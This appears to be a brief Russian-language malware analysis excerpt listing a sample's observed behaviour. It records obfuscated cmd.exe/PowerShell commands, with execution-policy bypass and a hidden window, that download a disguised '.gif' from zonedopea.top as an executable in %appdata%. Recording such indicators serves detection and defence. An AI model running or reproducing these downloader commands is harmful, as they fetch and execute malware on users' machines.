Техническая информация
- http://www.zonedopea.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWeRShEll.exE -EXeCuTioNpoLICy byPASS -noProFIlE -WInDOWSTyLe hIddEN (NEw-ObjECT YStEM.NET.wEbclIEnt).DOwNlOadFILe('http://www.zonedopea.top/read.php?f=1.gif','%apPdAtA%.exE');ta...
- '<SYSTEM32>\cmd.exe' /C "pOWeRShEll.exE -EXeCuTioNpoLICy byPASS -noProFIlE -WInDOWSTyLe hIddEN (NEw-ObjECT YStEM.NET.wEbclIEnt).DOwNlOadFILe('http://www.zonedopea.top/read.php?f=1.gif','%apPdAtA%.exE');ta...' (со скрытым окном)